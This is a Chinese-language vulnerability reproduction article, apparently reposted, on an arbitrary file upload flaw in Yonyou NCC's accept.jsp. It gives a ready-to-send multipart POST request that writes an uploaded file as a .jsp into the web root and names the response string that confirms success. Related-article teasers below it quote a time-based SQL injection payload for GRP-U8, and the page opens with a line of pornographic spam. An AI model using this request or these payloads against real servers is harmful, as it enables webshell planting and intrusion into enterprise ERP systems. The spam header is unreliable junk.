国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

用友ncc accept.jsp漏洞

這篇具有很好參考價值的文章主要介紹了用友ncc accept.jsp漏洞。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點(diǎn)擊"舉報違法"按鈕提交疑問。

漏洞原理

accept.jsp源碼中設(shè)置了白名單和黑名單的代碼,但是白名單代碼被注釋掉了(默認(rèn)被注釋)

只啟用了黑名單。文件保存的函數(shù)fname又被定義為可以隨便更改。

那可以上傳白名單內(nèi)的文件名,然后通過傳參將文件保存的名字進(jìn)行修改。以及修改文件位置

(具體源碼不能夠在平臺展示出)

漏洞靶場復(fù)現(xiàn)

以下復(fù)現(xiàn)常見均在靶場上進(jìn)行,請獲得授權(quán)后在開展?jié)B透

用友ncc accept.jsp漏洞

訪問頁面 http://ip:prot//aim/equipmap/accept.jsp

頁面存在存在 則表明漏洞可能能夠利用

通過POST發(fā)送數(shù)據(jù)包

POST /aim/equipmap/accept.jsp HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 370
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------16314487820932200903769468567
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip

-----------------------------16314487820932200903769468567
Content-Disposition: form-data; name="upload"; filename="test.txt"
Content-Type: text/plain

win
-----------------------------16314487820932200903769468567
Content-Disposition: form-data; name="fname"

\webapps\nc_web\test.jsp
-----------------------------16314487820932200903769468567--
用友ncc accept.jsp漏洞

解析一下請求的意思

這里值得注意的是 因為安裝環(huán)境不同,所以可能會遇到保存的路徑不一致的情況,這時候需要猜測服務(wù)器的路徑。(但是默認(rèn)為POC中的路徑)

然后根據(jù)響應(yīng)包是否包含parent.afterUpload(1)來判斷文件是否上傳成功

上傳成功訪問

用友ncc accept.jsp漏洞

以上復(fù)現(xiàn)均在靶場上實(shí)現(xiàn)!網(wǎng)絡(luò)不是法外之地!請遵循中華人民共和國網(wǎng)絡(luò)安全法 文章來源地址http://www.zghlxwxcb.cn/news/detail-476955.html

到了這里,關(guān)于用友ncc accept.jsp漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請點(diǎn)擊違法舉報進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 用友時空 KSOA 多處SQL注入漏洞復(fù)現(xiàn)

    用友時空 KSOA 多處SQL注入漏洞復(fù)現(xiàn)

    用友時空 KSOA 是建立在 SOA 理念指導(dǎo)下研發(fā)的新一代產(chǎn)品,是根據(jù)流通企業(yè)前沿的 IT 需求推出的統(tǒng)一的IT基礎(chǔ)架構(gòu),它可以讓流通企業(yè)各個時期建立的 IT 系統(tǒng)之間彼此輕松對話。 用友時空 KSOA 系統(tǒng) PayBill、QueryService、linkadd.jsp等接口處存在 sql 注入漏洞,攻擊者可通過這些漏洞

    2024年02月04日
    瀏覽(23)
  • 用友GRP-U8 SQL注入漏洞復(fù)現(xiàn)

    用友GRP-U8 SQL注入漏洞復(fù)現(xiàn)

    ? ? 用友GRP-U8R10行政事業(yè)財務(wù)管理軟件是用友公司專注于國家電子政務(wù)事業(yè),基于云計算技術(shù)所推出的新一代產(chǎn)品,是我國行政事業(yè)財務(wù)領(lǐng)域最專業(yè)的政府財務(wù)管理軟件。 ?用友GRP-U8的bx_historyDataCheck jsp、slbmbygr.jsp等接口存在SQL注入漏洞,由于用友GRP-U8未對用戶的輸入進(jìn)行有

    2024年02月07日
    瀏覽(20)
  • 用友時空KSOA ImageUpload任意文件上傳漏洞復(fù)現(xiàn)+利用

    用友時空KSOA ImageUpload任意文件上傳漏洞復(fù)現(xiàn)+利用

    ??用友時空KSOA是建立在SOA理念指導(dǎo)下研發(fā)的新一代產(chǎn)品,是根據(jù)流通企業(yè)最前沿的I需求推出的統(tǒng)一的IT基礎(chǔ)架構(gòu),它可以讓流通企業(yè)各個時期建立的IT系統(tǒng)之間彼此輕松對話,幫助流通企業(yè)保護(hù)原有的IT投資,簡化IT管理,提升競爭能力,確保企業(yè)整體的戰(zhàn)略目標(biāo)以及創(chuàng)新活

    2024年02月15日
    瀏覽(46)
  • 用友NC word.docx 任意文件讀取漏洞復(fù)現(xiàn)

    用友NC word.docx 任意文件讀取漏洞復(fù)現(xiàn)

    ?用友NC是一款企業(yè)級ERP軟件。作為一種信息化管理工具,用友NC提供了一系列業(yè)務(wù)管理模塊,包括財務(wù)會計、采購管理、銷售管理、物料管理、生產(chǎn)計劃和人力資源管理等,幫助企業(yè)實(shí)現(xiàn)數(shù)字化轉(zhuǎn)型和高效管理。 用友NC 系統(tǒng)word.docx等接口存在任意文件讀取漏洞,未經(jīng)身份認(rèn)證

    2024年01月25日
    瀏覽(22)
  • 用友 GRP-U8 存在sql注入漏洞復(fù)現(xiàn)

    用友 GRP-U8 存在sql注入漏洞復(fù)現(xiàn)

    用友 GRP-U8 license_check.jsp 存在sql注入,攻擊者可利用該漏洞執(zhí)行任意SQL語句,如查詢數(shù)據(jù)、下載數(shù)據(jù)、寫入webshell、執(zhí)行系統(tǒng)命令以及繞過登錄限制等。 fofa:app=”用友-GRP-U8” /u8qx/license_check.jsp?kjnd=1’;WAITFOR%20DELAY%20’0:0:3’— 命令:nuclei -t /nuclei-poc/yonyou/用友-GRP-U8+sql.yaml -

    2024年02月08日
    瀏覽(25)
  • 用友NC BeanShell命令執(zhí)行漏洞(CNVD-2021-30167)+任意文件讀取漏洞+接口信息泄露

    用友NC BeanShell命令執(zhí)行漏洞(CNVD-2021-30167)+任意文件讀取漏洞+接口信息泄露

    用友NC是一款企業(yè)級管理軟件,在大中型企業(yè)廣泛使用。實(shí)現(xiàn)建模、開發(fā)、繼承、運(yùn)行、管理一體化的IT解決方案信息化平臺。用友 NC bsh.servlet.BshServlet 存在遠(yuǎn)程命令執(zhí)行漏洞,通過BeanShell 執(zhí)行遠(yuǎn)程命令獲取服務(wù)器權(quán)限。 漏洞POC 訪問出現(xiàn)這個頁面 可能存在漏洞(還有一種情

    2024年02月11日
    瀏覽(33)
  • 實(shí)戰(zhàn)紅隊挖掘漏洞---用友時空KSOA v9.0版本ImageUpload任意文件上傳漏洞+getshell

    前言,本次筆記是記錄在工作中的打紅隊時挖到的用友時空KSOA任意文件上傳漏洞。 emmm,怎么說呢,就是又在一次加班碼到晚上十點(diǎn)的時候,挖掘到了一個用友時空ksoa v9.0文件上傳漏洞。 大家先看看長什么樣吧,大概就這樣!版本這么明目張膽的就展現(xiàn)在我面前,不找一下這

    2024年02月08日
    瀏覽(23)
  • 基于 NCC/灰度信息 的模板匹配算法(QT + Opencv + C++),10ms內(nèi)獲取匹配結(jié)果,部分源碼

    基于 NCC/灰度信息 的模板匹配算法(QT + Opencv + C++),10ms內(nèi)獲取匹配結(jié)果,部分源碼

    文后代碼,優(yōu)化效果圖結(jié)尾處,最快3ms得到匹配結(jié)果 NCC,全稱為Normalized Cross Correlation,即歸一化互相關(guān)系數(shù), 在模板匹配中使用的非常非常廣泛,也是眾多模板匹配方法中非常耀眼的存在, 這個匹配的理論核心基礎(chǔ)公式如下: 其實(shí)Opencv的matchTemplate函數(shù)使用的就是這個公式

    2024年02月08日
    瀏覽(21)
  • 用友NC NCCLOUD BIP ldap公共入口uapjs漏洞補(bǔ)丁

    補(bǔ)丁名稱 問題描述 發(fā)布時間 產(chǎn)品版本 領(lǐng)域 模塊 nc65_sysFunctionManager下標(biāo)越界和空指針合集補(bǔ)丁 2023-3-23 10:03 NC6.5 集團(tuán)采供 庫存管理 nc633_ldap公共入口漏洞補(bǔ)丁 nc633_ldap公共入口漏洞補(bǔ)丁 2023-3-20 16:59 NC6.33 UAP 基礎(chǔ)技術(shù)框架 nc65_ldap公共入口漏洞補(bǔ)丁 nc65_ldap公共入口漏洞補(bǔ)丁 20

    2024年02月13日
    瀏覽(16)
  • 用友 GRP-U8 Proxy XXE-SQL注入漏洞

    用友 GRP-U8 Proxy XXE-SQL注入漏洞

    本篇文章僅限技術(shù)學(xué)習(xí)與安全研究,切勿將文中所涉及的攻擊手段用于非授權(quán)下滲透行為,造成任何后果與本文和作者無關(guān)。 用友GRP-U8R10行政事業(yè)財務(wù)管理軟件是用友公司專注于國家電子政務(wù)事業(yè),基于云計算技術(shù)所推出的新一代產(chǎn)品,是我國行政事業(yè)財務(wù)領(lǐng)域最專業(yè)的政府

    2023年04月08日
    瀏覽(16)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包